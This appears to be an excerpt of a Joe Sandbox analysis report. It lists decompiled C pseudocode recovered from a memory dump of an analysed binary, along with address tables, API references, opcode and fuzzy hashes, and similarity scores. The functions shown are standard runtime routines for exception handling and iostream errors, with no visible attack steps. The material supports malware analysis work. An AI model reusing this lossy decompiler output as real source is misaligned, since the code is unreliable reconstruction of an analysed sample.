                                                                                      0x00407d1f
                                                                                      0x00407d34
                                                                                      0x00407d53
                                                                                      0x00407d55
                                                                                      0x00407d5d
                                                                                      0x00407d36
                                                                                      0x00407d38
                                                                                      0x00407d3a
                                                                                      0x00407d42
                                                                                      0x00407d42
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407ce1
                                                                                      0x00407ce7
                                                                                      0x00407d21
                                                                                      0x00407d23
                                                                                      0x00407d25
                                                                                      0x00407d2d
                                                                                      0x00407ce9
                                                                                      0x00407cef
                                                                                      0x00407d0e
                                                                                      0x00407d10
                                                                                      0x00407d18
                                                                                      0x00407cf1
                                                                                      0x00407cf3
                                                                                      0x00407cf5
                                                                                      0x00407cfd
                                                                                      0x00407cfd
                                                                                      0x00407cef
                                                                                      0x00407ce7
                                                                                      0x00407a54
                                                                                      0x00407a54
                                                                                      0x00407a5e
                                                                                      0x00407a98
                                                                                      0x00407a9b
                                                                                      0x00407aaa
                                                                                      0x00407a60
                                                                                      0x00407a69
                                                                                      0x00407a6c
                                                                                      0x00407a72
                                                                                      0x00407a7b
                                                                                      0x00407a84
                                                                                      0x00407a91
                                                                                      0x00407a93
                                                                                      0x00407a93
                                                                                      0x00407ab6
                                                                                      0x00407ab9
                                                                                      0x00407abd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407abd
                                                                                      0x00407a4e
                                                                                      0x00000000
                                                                                      0x00407a45
                                                                                      0x00000000
                                                                                      0x00407a34
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strcspn
                                                                                      • String ID: +a@
                                                                                      • API String ID: 3709121408-3244518245
                                                                                      • Opcode ID: 5e8437755218b70344b1982da8d9e17de5206cc51d7c4cfdee2f9b72651764a7
                                                                                      • Instruction ID: 508c6d915f9254a6b0e9845a21f0e11d85ce9535701cc70608269ce45632ccfa
                                                                                      • Opcode Fuzzy Hash: 5e8437755218b70344b1982da8d9e17de5206cc51d7c4cfdee2f9b72651764a7
                                                                                      • Instruction Fuzzy Hash: 72E1AE71E042499FDF04DFA8C884AEEBBB5EF49304F14806AE815BB391D738E945CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0041D06D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorHandling__start
                                                                                      • String ID: pow
                                                                                      • API String ID: 3213639722-2276729525
                                                                                      • Opcode ID: 53a87f3bb7df7e35730d172635f75f797c4e2345677e7362e84e52001b1ca687
                                                                                      • Instruction ID: 8d7ce4bedb2077184ed2a48982ab9f327208b51c00b579dbadb4d7d4ca4bc968
                                                                                      • Opcode Fuzzy Hash: 53a87f3bb7df7e35730d172635f75f797c4e2345677e7362e84e52001b1ca687
                                                                                      • Instruction Fuzzy Hash: C4515BF1F0C50296CB117B28E9413AB6F90DB84754F70896FE0D5423A9EB3D9CC69A4E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 41%
                                                                                      			E00403910(void* __ebx, intOrPtr* __ecx) {
                                                                                      				char _v4;
                                                                                      				intOrPtr _v8;
                                                                                      				intOrPtr _v16;
                                                                                      				char _v24;
                                                                                      				intOrPtr* _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v40;
                                                                                      				intOrPtr _v44;
                                                                                      				signed int _v60;
                                                                                      				void* _v76;
                                                                                      				void* _v104;
                                                                                      				intOrPtr _v112;
                                                                                      				void* _v128;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t42;
                                                                                      				intOrPtr* _t45;
                                                                                      				intOrPtr _t48;
                                                                                      				signed int _t53;
                                                                                      				signed int _t59;
                                                                                      				void* _t62;
                                                                                      				void* _t73;
                                                                                      				intOrPtr* _t76;
                                                                                      				intOrPtr _t80;
                                                                                      				void* _t83;
                                                                                      				signed char _t85;
                                                                                      				intOrPtr* _t86;
                                                                                      				intOrPtr* _t88;
                                                                                      				intOrPtr _t91;
                                                                                      				intOrPtr* _t93;
                                                                                      				char* _t100;
                                                                                      				intOrPtr _t101;
                                                                                      				signed int _t105;
                                                                                      				signed int _t107;
                                                                                      				void* _t111;
                                                                                      				signed int _t114;
                                                                                      				signed int _t115;
                                                                                      				void* _t120;
                                                                                      
                                                                                      				_t73 = _t111;
                                                                                      				_t114 = (_t111 - 0x00000008 & 0xfffffff8) + 4;
                                                                                      				_v8 =  *((intOrPtr*)(_t73 + 4));
                                                                                      				_t105 = _t114;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x43156d);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_push(_t73);
                                                                                      				_t115 = _t114 - 0x20;
                                                                                      				_t42 =  *0x443048; // 0x9900ec21
                                                                                      				_push(_t42 ^ _t105);
                                                                                      				 *[fs:0x0] =  &_v24;
                                                                                      				_t96 = __ecx;
                                                                                      				_v32 = __ecx;
                                                                                      				_t45 =  *((intOrPtr*)(_t73 + 0xc));
                                                                                      				asm("xorps xmm0, xmm0");
                                                                                      				_t88 =  *((intOrPtr*)(_t73 + 8));
                                                                                      				_t76 = _t88;
                                                                                      				_v32 = __ecx;
                                                                                      				asm("movups [ebp-0x30], xmm0");
                                                                                      				_t91 =  *_t45;
                                                                                      				_v32 =  *((intOrPtr*)(_t45 + 4));
                                                                                      				_v44 = 0;
                                                                                      				_v40 = 0;
                                                                                      				_v36 = _t76 + 1;
                                                                                      				do {
                                                                                      					_t48 =  *_t76;
                                                                                      					_t76 = _t76 + 1;
                                                                                      				} while (_t48 != 0);
                                                                                      				_push(_t76 - _v36);
                                                                                      				_push(_t88);
                                                                                      				E00402830(_t73,  &_v60, _t88, _t91, __ecx);
                                                                                      				_v16 = 0;
                                                                                      				_push( &_v60);
                                                                                      				_push(_v32);
                                                                                      				E00402FD0(_t73, __ecx, _t88, _t91, _t91);
                                                                                      				_t80 = _v40;
                                                                                      				if(_t80 < 0x10) {
                                                                                      					L6:
                                                                                      					 *_t96 = 0x4345d0;
                                                                                      					 *[fs:0x0] = _v24;
                                                                                      					return _t96;
                                                                                      				} else {
                                                                                      					_t89 = _v60;
                                                                                      					_t83 = _t80 + 1;
                                                                                      					_t53 = _v60;
                                                                                      					if(_t83 < 0x1000) {
                                                                                      						L5:
                                                                                      						_push(_t83);
                                                                                      						E004138AD(_t89);
                                                                                      						goto L6;
                                                                                      					} else {
                                                                                      						_t89 =  *((intOrPtr*)(_t53 - 4));
                                                                                      						_t83 = _t83 + 0x23;
                                                                                      						if(_t53 -  *((intOrPtr*)(_t53 - 4)) + 0xfffffffc > 0x1f) {
                                                                                      							E0041805F(_t73, _t83, _t89);
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							asm("int3");
                                                                                      							_push(_t105);
                                                                                      							_t107 = _t115;
                                                                                      							_t120 = (_t115 & 0xfffffff8) - 0x1c;
                                                                                      							_t59 = _v60 & 0x00000017;
                                                                                      							 *(_t83 + 0xc) = _t59;
                                                                                      							_push(__ecx);
                                                                                      							_t85 =  *(_t83 + 0x10) & _t59;
                                                                                      							if(_t85 == 0) {
                                                                                      								return _t59;
                                                                                      							} else {
                                                                                      								if(_v4 != 0) {
                                                                                      									E00414B7B(0, 0);
                                                                                      								}
                                                                                      								if((_t85 & 0x00000004) == 0) {
                                                                                      									_t100 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
                                                                                      								} else {
                                                                                      									_t100 = "ios_base::badbit set";
                                                                                      								}
                                                                                      								_t62 = E00402FB0(_t120 + 4, 1);
                                                                                      								_t86 = _t120 + 0x14;
                                                                                      								_push(_t62);
                                                                                      								E00403910(_t73, _t86, _t100);
                                                                                      								E00414B7B(_t120 + 0x18, 0x4422f0);
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								_push(_t107);
                                                                                      								_push(_t100);
                                                                                      								_t101 = _v112;
                                                                                      								asm("xorps xmm0, xmm0");
                                                                                      								_push(_t91);
                                                                                      								_t93 = _t86;
                                                                                      								 *_t93 = 0x433244;
                                                                                      								asm("movq [eax], xmm0");
                                                                                      								E00414631(_t101 + 4, _t93 + 4);
                                                                                      								 *_t93 = 0x43459c;
                                                                                      								 *((intOrPtr*)(_t93 + 0xc)) =  *((intOrPtr*)(_t101 + 0xc));
                                                                                      								 *((intOrPtr*)(_t93 + 0x10)) =  *((intOrPtr*)(_t101 + 0x10));
                                                                                      								 *_t93 = 0x4345d0;
                                                                                      								return _t93;
                                                                                      							}
                                                                                      						} else {
                                                                                      							goto L5;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}










































                                                                                      0x00403911
                                                                                      0x00403919
                                                                                      0x00403920
                                                                                      0x00403924
                                                                                      0x00403926
                                                                                      0x00403928
                                                                                      0x00403933
                                                                                      0x00403934
                                                                                      0x00403935
                                                                                      0x0040393a
                                                                                      0x00403941
                                                                                      0x00403945
                                                                                      0x0040394b
                                                                                      0x0040394d
                                                                                      0x00403950
                                                                                      0x00403953
                                                                                      0x00403956
                                                                                      0x00403959
                                                                                      0x0040395b
                                                                                      0x0040395e
                                                                                      0x00403962
                                                                                      0x00403967
                                                                                      0x0040396d
                                                                                      0x00403974
                                                                                      0x0040397b
                                                                                      0x00403980
                                                                                      0x00403980
                                                                                      0x00403982
                                                                                      0x00403983
                                                                                      0x0040398a
                                                                                      0x0040398b
                                                                                      0x0040398f
                                                                                      0x00403997
                                                                                      0x0040399e
                                                                                      0x0040399f
                                                                                      0x004039a5
                                                                                      0x004039aa
                                                                                      0x004039b0
                                                                                      0x004039da
                                                                                      0x004039da
                                                                                      0x004039e5
                                                                                      0x004039f5
                                                                                      0x004039b2
                                                                                      0x004039b2
                                                                                      0x004039b5
                                                                                      0x004039b6
                                                                                      0x004039be
                                                                                      0x004039d0
                                                                                      0x004039d0
                                                                                      0x004039d2
                                                                                      0x00000000
                                                                                      0x004039c0
                                                                                      0x004039c0
                                                                                      0x004039c3
                                                                                      0x004039ce
                                                                                      0x004039f8
                                                                                      0x004039fd
                                                                                      0x004039fe
                                                                                      0x004039ff
                                                                                      0x00403a00
                                                                                      0x00403a01
                                                                                      0x00403a09
                                                                                      0x00403a0c
                                                                                      0x00403a0f
                                                                                      0x00403a15
                                                                                      0x00403a16
                                                                                      0x00403a18
                                                                                      0x00403a26
                                                                                      0x00403a1a
                                                                                      0x00403a1e
                                                                                      0x00403a2d
                                                                                      0x00403a2d
                                                                                      0x00403a35
                                                                                      0x00403a4b
                                                                                      0x00403a37
                                                                                      0x00403a37
                                                                                      0x00403a37
                                                                                      0x00403a55
                                                                                      0x00403a5d
                                                                                      0x00403a61
                                                                                      0x00403a63
                                                                                      0x00403a72
                                                                                      0x00403a77
                                                                                      0x00403a78
                                                                                      0x00403a79
                                                                                      0x00403a7a
                                                                                      0x00403a7b
                                                                                      0x00403a7c
                                                                                      0x00403a7d
                                                                                      0x00403a7e
                                                                                      0x00403a7f
                                                                                      0x00403a80
                                                                                      0x00403a83
                                                                                      0x00403a84
                                                                                      0x00403a87
                                                                                      0x00403a8a
                                                                                      0x00403a8b
                                                                                      0x00403a91
                                                                                      0x00403a97
                                                                                      0x00403a9f
                                                                                      0x00403aa4
                                                                                      0x00403ab3
                                                                                      0x00403ab8
                                                                                      0x00403abb
                                                                                      0x00403ac4
                                                                                      0x00403ac4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004039ce
                                                                                      0x004039be

                                                                                      APIs
                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00403A9F
                                                                                        • Part of subcall function 00414B7B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,004123EF,?,00441908,00402904,string too long,00402904,?,?,?), ref: 00414BDB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                      • API String ID: 3109751735-1240500531
                                                                                      • Opcode ID: 8b909b2bb1234562f583ad847829b05ce1602294e1d4aafb34658e8c9b2d4523
                                                                                      • Instruction ID: dff861e1577ca60c34eef900b601ccfe213b4d2046d6d65c0aa6cf5fb82dfb42
                                                                                      • Opcode Fuzzy Hash: 8b909b2bb1234562f583ad847829b05ce1602294e1d4aafb34658e8c9b2d4523
                                                                                      • Instruction Fuzzy Hash: A651EAB1910208ABC704DF59CC41B9AFBF8EF49710F14862FF954A77C1E778AA448B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E0041710F(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				intOrPtr* _v16;
                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				signed int _v36;
                                                                                      				void* _v40;
                                                                                      				intOrPtr _v44;
                                                                                      				signed int _v48;
                                                                                      				intOrPtr _v56;
                                                                                      				void _v60;
                                                                                      				signed char* _v68;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				void* _t74;
                                                                                      				void* _t75;
                                                                                      				char _t76;
                                                                                      				signed char _t78;
                                                                                      				signed int _t80;
                                                                                      				signed char* _t81;
                                                                                      				signed int _t82;
                                                                                      				signed int _t83;
                                                                                      				intOrPtr* _t87;
                                                                                      				void* _t90;
                                                                                      				signed char* _t93;
                                                                                      				intOrPtr* _t96;
                                                                                      				signed char _t97;
                                                                                      				intOrPtr _t98;
                                                                                      				intOrPtr _t99;
                                                                                      				intOrPtr* _t101;
                                                                                      				signed int _t102;
                                                                                      				signed int _t103;
                                                                                      				signed char _t108;
                                                                                      				signed char* _t111;
                                                                                      				signed int _t112;
                                                                                      				void* _t113;
                                                                                      				signed char* _t116;
                                                                                      				void* _t121;
                                                                                      				signed int _t123;
                                                                                      				void* _t130;
                                                                                      				void* _t131;
                                                                                      
                                                                                      				_t110 = __edx;
                                                                                      				_t100 = __ecx;
                                                                                      				_t96 = _a4;
                                                                                      				if( *_t96 == 0x80000003) {
                                                                                      					return _t74;
                                                                                      				} else {
                                                                                      					_t75 = E004169EE(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
                                                                                      					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                                                                                      						__imp__EncodePointer(0);
                                                                                      						_t121 = _t75;
                                                                                      						if( *((intOrPtr*)(E004169EE(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                                                                                      							_t87 = E00414348(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                                                                                      							_t130 = _t130 + 0x1c;
                                                                                      							if(_t87 != 0) {
                                                                                      								L16:
                                                                                      								return _t87;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_t76 = _a20;
                                                                                      					_v24 = _t76;
                                                                                      					_v20 = 0;
                                                                                      					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                                                                                      						_push(_a28);
                                                                                      						E0041427B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                                                                                      						_t112 = _v36;
                                                                                      						_t131 = _t130 + 0x18;
                                                                                      						_t87 = _v40;
                                                                                      						_v16 = _t87;
                                                                                      						_v8 = _t112;
                                                                                      						if(_t112 < _v28) {
                                                                                      							_t102 = _t112 * 0x14;
                                                                                      							_v12 = _t102;
                                                                                      							do {
                                                                                      								_t103 = 5;
                                                                                      								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                                                                                      								_t131 = _t131 + 0xc;
                                                                                      								if(_v60 <= _t90 && _t90 <= _v56) {
                                                                                      									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                                                                                      									_t108 = _t93[4];
                                                                                      									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                                                                                      										if(( *_t93 & 0x00000040) == 0) {
                                                                                      											_push(0);
                                                                                      											_push(1);
                                                                                      											E00416CEA(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                                                                                      											_t112 = _v8;
                                                                                      											_t131 = _t131 + 0x30;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								_t112 = _t112 + 1;
                                                                                      								_t87 = _v16;
                                                                                      								_t102 = _v12 + 0x14;
                                                                                      								_v8 = _t112;
                                                                                      								_v12 = _t102;
                                                                                      							} while (_t112 < _v28);
                                                                                      						}
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					E0041D1C9(_t96, _t100, _t110, 0, _t121);
                                                                                      					asm("int3");
                                                                                      					_t111 = _v68;
                                                                                      					_push(_t96);
                                                                                      					_push(_t121);
                                                                                      					_push(0);
                                                                                      					_t78 = _t111[4];
                                                                                      					if(_t78 == 0) {
                                                                                      						L41:
                                                                                      						_t80 = 1;
                                                                                      					} else {
                                                                                      						_t101 = _t78 + 8;
                                                                                      						if( *_t101 == 0) {
                                                                                      							goto L41;
                                                                                      						} else {
                                                                                      							_t116 = _a4;
                                                                                      							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                                                                                      								_t97 = _t116[4];
                                                                                      								_t123 = 0;
                                                                                      								if(_t78 == _t97) {
                                                                                      									L33:
                                                                                      									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                                                                                      										_t81 = _a8;
                                                                                      										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                                                                                      											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                                                                                      												_t123 = 1;
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      									_t80 = _t123;
                                                                                      								} else {
                                                                                      									_t82 = _t97 + 8;
                                                                                      									while(1) {
                                                                                      										_t98 =  *_t101;
                                                                                      										if(_t98 !=  *_t82) {
                                                                                      											break;
                                                                                      										}
                                                                                      										if(_t98 == 0) {
                                                                                      											L29:
                                                                                      											_t83 = _t123;
                                                                                      										} else {
                                                                                      											_t99 =  *((intOrPtr*)(_t101 + 1));
                                                                                      											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                                                                                      												break;
                                                                                      											} else {
                                                                                      												_t101 = _t101 + 2;
                                                                                      												_t82 = _t82 + 2;
                                                                                      												if(_t99 != 0) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													goto L29;
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      										L31:
                                                                                      										if(_t83 == 0) {
                                                                                      											goto L33;
                                                                                      										} else {
                                                                                      											_t80 = 0;
                                                                                      										}
                                                                                      										goto L42;
                                                                                      									}
                                                                                      									asm("sbb eax, eax");
                                                                                      									_t83 = _t82 | 0x00000001;
                                                                                      									goto L31;
                                                                                      								}
                                                                                      							} else {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L42:
                                                                                      					return _t80;
                                                                                      				}
                                                                                      			}















































                                                                                      0x0041710f
                                                                                      0x0041710f
                                                                                      0x00417116
                                                                                      0x0041711f
                                                                                      0x0041723e
                                                                                      0x00417125
                                                                                      0x00417127
                                                                                      0x00417131
                                                                                      0x00417134
                                                                                      0x0041713a
                                                                                      0x00417144
                                                                                      0x00417169
                                                                                      0x0041716e
                                                                                      0x00417173
                                                                                      0x0041723a
                                                                                      0x00000000
                                                                                      0x0041723b
                                                                                      0x00417173
                                                                                      0x00417144
                                                                                      0x00417179
                                                                                      0x0041717c
                                                                                      0x0041717f
                                                                                      0x00417185
                                                                                      0x0041718b
                                                                                      0x0041719d
                                                                                      0x004171a2
                                                                                      0x004171a5
                                                                                      0x004171a8
                                                                                      0x004171ab
                                                                                      0x004171ae
                                                                                      0x004171b4
                                                                                      0x004171ba
                                                                                      0x004171bd
                                                                                      0x004171c0
                                                                                      0x004171cf
                                                                                      0x004171d0
                                                                                      0x004171d0
                                                                                      0x004171d5
                                                                                      0x004171e8
                                                                                      0x004171ea
                                                                                      0x004171ef
                                                                                      0x004171fa
                                                                                      0x004171fc
                                                                                      0x004171fe
                                                                                      0x0041721a
                                                                                      0x0041721f
                                                                                      0x00417222
                                                                                      0x00417222
                                                                                      0x004171fa
                                                                                      0x004171ef
                                                                                      0x00417228
                                                                                      0x00417229
                                                                                      0x0041722c
                                                                                      0x0041722f
                                                                                      0x00417232
                                                                                      0x00417235
                                                                                      0x004171c0
                                                                                      0x00000000
                                                                                      0x004171b4
                                                                                      0x0041723f
                                                                                      0x00417244
                                                                                      0x00417248
                                                                                      0x0041724b
                                                                                      0x0041724c
                                                                                      0x0041724d
                                                                                      0x0041724e
                                                                                      0x00417253
                                                                                      0x004172cb
                                                                                      0x004172cd
                                                                                      0x00417255
                                                                                      0x00417255
                                                                                      0x0041725b
                                                                                      0x00000000
                                                                                      0x0041725d
                                                                                      0x00417260
                                                                                      0x00417263
                                                                                      0x0041726a
                                                                                      0x0041726d
                                                                                      0x00417271
                                                                                      0x004172a3
                                                                                      0x004172a6
                                                                                      0x004172ad
                                                                                      0x004172b3
                                                                                      0x004172bd
                                                                                      0x004172c6
                                                                                      0x004172c6
                                                                                      0x004172bd
                                                                                      0x004172b3
                                                                                      0x004172c7
                                                                                      0x00417273
                                                                                      0x00417273
                                                                                      0x00417276
                                                                                      0x00417276
                                                                                      0x0041727a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041727e
                                                                                      0x00417292
                                                                                      0x00417292
                                                                                      0x00417280
                                                                                      0x00417280
                                                                                      0x00417286
                                                                                      0x00000000
                                                                                      0x00417288
                                                                                      0x00417288
                                                                                      0x0041728b
                                                                                      0x00417290
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00417290
                                                                                      0x00417286
                                                                                      0x0041729b
                                                                                      0x0041729d
                                                                                      0x00000000
                                                                                      0x0041729f
                                                                                      0x0041729f
                                                                                      0x0041729f
                                                                                      0x00000000
                                                                                      0x0041729d
                                                                                      0x00417296
                                                                                      0x00417298
                                                                                      0x00000000
                                                                                      0x00417298
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00417263
                                                                                      0x0041725b
                                                                                      0x004172ce
                                                                                      0x004172d2
                                                                                      0x004172d2

                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 00417134
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2118026453-2084237596
                                                                                      • Opcode ID: 2a40fb4bdf83400d2650afdc796ba9e505080c47c9f2870ea470e087ecee65f9
                                                                                      • Instruction ID: d458f8df66f3d856a3ef55368f4534f47102a0e82d5f8415460ec7bf2e3ef8d2
                                                                                      • Opcode Fuzzy Hash: 2a40fb4bdf83400d2650afdc796ba9e505080c47c9f2870ea470e087ecee65f9
                                                                                      • Instruction Fuzzy Hash: 7A417C71900209AFCF16DF98CD81AEEBBB5FF48304F15819AF904A7211D339D991DB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 81%
                                                                                      			E00407040(intOrPtr* __ecx, void* __eflags) {
                                                                                      				char _v8;
                                                                                      				char _v16;
                                                                                      				intOrPtr* _v20;
                                                                                      				void* _v24;
                                                                                      				intOrPtr* _v28;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t45;
                                                                                      				intOrPtr _t51;
                                                                                      				intOrPtr* _t52;
                                                                                      				intOrPtr _t53;
                                                                                      				intOrPtr* _t54;
                                                                                      				intOrPtr _t55;
                                                                                      				void* _t56;
                                                                                      				intOrPtr* _t57;
                                                                                      				intOrPtr* _t60;
                                                                                      				intOrPtr* _t66;
                                                                                      				intOrPtr _t67;
                                                                                      				intOrPtr* _t70;
                                                                                      				intOrPtr _t71;
                                                                                      				void* _t72;
                                                                                      				intOrPtr* _t73;
                                                                                      				void* _t75;
                                                                                      				intOrPtr _t76;
                                                                                      				intOrPtr* _t77;
                                                                                      				signed int _t79;
                                                                                      
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x4319d0);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_push(_t56);
                                                                                      				_push(_t75);
                                                                                      				_push(_t72);
                                                                                      				_t45 =  *0x443048; // 0x9900ec21
                                                                                      				_push(_t45 ^ _t79);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_v20 = __ecx;
                                                                                      				_v28 = __ecx;
                                                                                      				_v28 = __ecx;
                                                                                      				 *__ecx = 0x43e9d0;
                                                                                      				_t76 = E0041362C(_t56, _t72, _t75, __eflags, 8);
                                                                                      				asm("xorps xmm0, xmm0");
                                                                                      				asm("movq [esi], xmm0");
                                                                                      				_push(1);
                                                                                      				_v8 = 0;
                                                                                      				 *((intOrPtr*)(_t76 + 4)) = E00412660(_t56, _t72, _t76, __eflags);
                                                                                      				_t51 = _v20;
                                                                                      				_t66 = _t51 + 0x18;
                                                                                      				_t70 = _t51 + 0x24;
                                                                                      				_t73 = _t51 + 0x14;
                                                                                      				 *((intOrPtr*)(_t51 + 0x34)) = _t76;
                                                                                      				_t57 = _t51 + 4;
                                                                                      				 *((intOrPtr*)(_t51 + 0xc)) = _t57;
                                                                                      				_t77 = _t51 + 8;
                                                                                      				 *((intOrPtr*)(_t51 + 0x20)) = _t66;
                                                                                      				 *((intOrPtr*)(_t51 + 0x2c)) = _t70;
                                                                                      				 *((intOrPtr*)(_t51 + 0x10)) = _t77;
                                                                                      				 *((intOrPtr*)(_t51 + 0x1c)) = _t73;
                                                                                      				_t52 = _t51 + 0x28;
                                                                                      				_v24 = _t57;
                                                                                      				_v28 = _t52;
                                                                                      				 *((intOrPtr*)(_v20 + 0x30)) = _t52;
                                                                                      				 *_t77 = 0;
                                                                                      				 *_t66 = 0;
                                                                                      				 *_t52 = 0;
                                                                                      				_t53 = _v20;
                                                                                      				 *_v24 = 0;
                                                                                      				_t60 = _v20;
                                                                                      				 *_t73 = 0;
                                                                                      				 *_t70 = 0;
                                                                                      				 *((intOrPtr*)(_t53 + 0x20)) = _t66;
                                                                                      				 *_t60 = 0x43ea30;
                                                                                      				 *((char*)(_t60 + 0x48)) = 0;
                                                                                      				 *((char*)(_t60 + 0x3d)) = 0;
                                                                                      				 *((intOrPtr*)(_t53 + 0xc)) = _v24;
                                                                                      				 *((intOrPtr*)(_t53 + 0x2c)) = _t70;
                                                                                      				 *((intOrPtr*)(_t53 + 0x10)) = _t77;
                                                                                      				 *((intOrPtr*)(_t53 + 0x1c)) = _t73;
                                                                                      				_t54 = _v28;
                                                                                      				 *((intOrPtr*)(_v20 + 0x30)) = _t54;
                                                                                      				 *_t77 = 0;
                                                                                      				 *_t66 = 0;
                                                                                      				_t67 =  *0x444f50; // 0x0
                                                                                      				 *_t54 = 0;
                                                                                      				_t55 = _v20;
                                                                                      				 *_v24 = 0;
                                                                                      				 *_t73 = 0;
                                                                                      				 *_t70 = 0;
                                                                                      				_t71 =  *0x444f54; // 0x0
                                                                                      				 *((intOrPtr*)(_t55 + 0x4c)) = 0;
                                                                                      				 *((intOrPtr*)(_t55 + 0x40)) = _t67;
                                                                                      				 *((intOrPtr*)(_t55 + 0x44)) = _t71;
                                                                                      				 *((intOrPtr*)(_t55 + 0x38)) = 0;
                                                                                      				 *[fs:0x0] = _v16;
                                                                                      				return _t55;
                                                                                      			}































                                                                                      0x00407043
                                                                                      0x00407045
                                                                                      0x00407050
                                                                                      0x00407054
                                                                                      0x00407055
                                                                                      0x00407056
                                                                                      0x00407057
                                                                                      0x0040705e
                                                                                      0x00407062
                                                                                      0x0040706a
                                                                                      0x0040706d
                                                                                      0x00407072
                                                                                      0x00407075
                                                                                      0x00407080
                                                                                      0x00407082
                                                                                      0x00407085
                                                                                      0x00407089
                                                                                      0x0040708b
                                                                                      0x00407097
                                                                                      0x0040709d
                                                                                      0x004070a0
